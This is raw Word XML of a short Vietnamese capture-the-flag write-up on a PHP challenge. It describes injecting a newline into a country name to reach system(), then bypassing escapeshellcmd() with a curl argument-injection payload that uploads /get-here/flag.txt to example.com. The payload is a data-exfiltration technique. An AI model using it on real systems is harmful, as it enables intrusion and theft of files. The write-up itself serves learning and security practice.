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5275" w14:textId="19F43C4A" w:rsidR="002F49FE" w:rsidRDefault="00D553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$cc là mã country</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C15543" w14:textId="77777777" w:rsidR="00D55386" w:rsidRDefault="00D553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$input là tên country</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084DAA47" w14:textId="4776C5A1" w:rsidR="00D55386" w:rsidRDefault="00D553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Đề bài yêu cầu tên nước phải có trong countrylist nhưng mã nước không được  có trong danh sách này thì mới chạy lệnh system()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32888FF9" w14:textId="3C081F2B" w:rsidR="00FB2979" w:rsidRDefault="00FB2979">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EA09B0D" w14:textId="4F1CCAF1" w:rsidR="00FB2979" w:rsidRDefault="00FB29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làm:</w:t>
      </w:r>
      <w:r w:rsidR="005D3B67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> chèn %0a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA24E4E" w14:textId="53A2B624" w:rsidR="005D3B67" w:rsidRDefault="005D3B67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24325893" w14:textId="14AB5F55" w:rsidR="005D3B67" w:rsidRPr="00FB21C8" w:rsidRDefault="005D3B67">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB21C8">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$input="Afghanistan\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7509E9" w14:textId="5E09F4CD" w:rsidR="00FB21C8" w:rsidRDefault="00FB21C8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F014F6A" w14:textId="018BA19D" w:rsidR="00FB21C8" w:rsidRDefault="00FB2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Biến yaml ban đầu như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C3BEC7" w14:textId="641C9FD5" w:rsidR="00FB21C8" w:rsidRDefault="00FB21C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B6563B" wp14:editId="762E2A60">
            <wp:extent cx="4495800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8B11" w14:textId="1760E450" w:rsidR="00FB21C8" w:rsidRDefault="00FB21C8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B23892E" w14:textId="3F92C3CB" w:rsidR="00FB21C8" w:rsidRDefault="00FB2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Nếu  </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB21C8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$input="Afghanistan\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, thì biến yaml sẽ bị thay đổi: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6E111E" w14:textId="0D7ED16E" w:rsidR="00FB21C8" w:rsidRDefault="00FB21C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6CE764" wp14:editId="46D2B962">
            <wp:extent cx="4394200" cy="127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445" w14:textId="02A5E2EB" w:rsidR="00FB21C8" w:rsidRDefault="00FB21C8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30FF0BE4" w14:textId="736AE088" w:rsidR="00FB21C8" w:rsidRDefault="00FB2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Mà </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB21C8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> $countryList["Afghanistan\n"]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> không tồn tại nên country_code =NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7FD21B" w14:textId="25543FDA" w:rsidR="00FB21C8" w:rsidRDefault="00FB21C8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A672DD0" w14:textId="26A4708E" w:rsidR="005D3B67" w:rsidRDefault="00FB21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chạy thử trên local:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4444E5" w14:textId="373459B5" w:rsidR="005D3B67" w:rsidRDefault="005D3B6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618A4D" wp14:editId="5CCA5251">
            <wp:extent cx="4021015" cy="2310668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436" cy="23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4C91" w14:textId="4C205262" w:rsidR="0085765D" w:rsidRDefault="0085765D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F054F3F" w14:textId="0E04EF9B" w:rsidR="0085765D" w:rsidRDefault="00857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Chạy được lệnh system() rồi làm sao bypass escapeshellcmd()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2894864F" w14:textId="5E3FBDD1" w:rsidR="00BD6BCA" w:rsidRDefault="008576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5D7602" wp14:editId="68FA1D37">
            <wp:extent cx="3634154" cy="1706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193" cy="17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D7E9" w14:textId="1AA4EF72" w:rsidR="0085765D" w:rsidRDefault="0085765D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DBEB701" w14:textId="2EEEB964" w:rsidR="0085765D" w:rsidRPr="0085765D" w:rsidRDefault="0085765D" w:rsidP="0085765D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0085765D">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$url = '-F password=@/</w:t>
      </w:r>
      <w:r w:rsidRPr="0085765D">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>get-here/flag.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="0085765D">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://example.com</w:t>
      </w:r>
      <w:r w:rsidRPr="0085765D">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0085765D">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4482AE2C" w14:textId="587F7CD9" w:rsidR="0085765D" w:rsidRPr="0085765D" w:rsidRDefault="0085765D" w:rsidP="0085765D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0085765D">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system(escapeshellcmd('curl '.$url));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DE3A85" w14:textId="77777777" w:rsidR="0085765D" w:rsidRDefault="0085765D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1701B122" w14:textId="73A0F05E" w:rsidR="00BD6BCA" w:rsidRPr="00D55386" w:rsidRDefault="00BD6BC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322EC1" wp14:editId="151D78DC">
            <wp:extent cx="5943600" cy="300941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87"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="300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6BCA" w:rsidRPr="00D553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29"/>
    <w:rsid w:val="001B3D29"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="005D3B67"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="0085765D"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00BD6BCA"/>
    <w:rsid w:val="00D55386"/>
    <w:rsid w:val="00FB21C8"/>
    <w:rsid w:val="00FB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6852B4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F001E895-3A59-1041-B3F3-8530CA35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2024-09-28T04:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-29T04:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>